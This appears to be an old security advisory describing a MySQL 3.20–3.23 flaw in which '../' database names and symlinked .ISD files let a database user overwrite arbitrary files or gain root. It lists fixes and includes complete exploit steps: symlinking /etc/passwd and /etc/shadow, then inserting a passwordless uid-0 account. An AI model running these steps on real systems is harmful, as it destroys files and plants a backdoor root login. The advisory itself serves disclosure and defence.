

    MySQL 3.20.32a (and others)... 3.23


    Lesha Pavlov found following.  Anybody, who get login and password
    to mysql can use it as  DoS or r00t exploit because mysql  accepts
    '../blah-blah' as valid database  name and each table  represented
    by 3 files tablename.ISD,  tablename.ISM and tablename.frm.   But,
    when mysqld checks table already  exists or not exists, it  checks
    _only_ tablename.frm.

    Usage this "vulnerable  features of mysql"  to make big  DoS (will
    overwrite any file you wish):

        $ cd /var/tmp
        $ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
        $ mysql -u user -h localhost -p somepassword '../../tmp'
        create table qqq(www int);
        File /some/file/you/wish/to/overwrite will be overwritten.

    Usage as r00t exploit:

        $ cd /var/tmp
        $ ln -s /etc/passwd gotcha.ISD
        $ ln -s /etc/shadow make_me_r00t.ISD
        $ mysql -u user -h localhost -p somepassword '../../tmp'
        create table gotcha(qqq varchar(255));
        create table make_me_r00t(qqq varchar(255));
        insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
        insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
        You getta r00t now!

    This DoS/exploit  tested on  mysql-3.20.32a but  other versions of
    mysql are also vulnerabile.

    This could affect RedHat's RPMs for Red Hat PowerTools 6.1 and 6.2
    which used an  ancient version of  MySQL: It was  the only version
    of MySQL  with a  free license  (they were  allowed to  distribute
    newer versions, but chose not to because of their license).

    The one shipped  with Red Hat  Linux 7, after  MySQL changed their
    standard license, is not affected as they don't run as root.


    * Patch  mysql  to  when  check  table  presents,  it  checks  all
      tablename.{ISD,ISM,frm} files, not only tablename.frm
    * Patch  mysql  to  treat  database  names,  started  by  '..'  as
      incorrect database names.
    * And Main recomendation - do not run mysqld as root!!!

    chowns existing database  tables to a  normal user and  run mysqld
    as this unprivileged user - it will be better solution!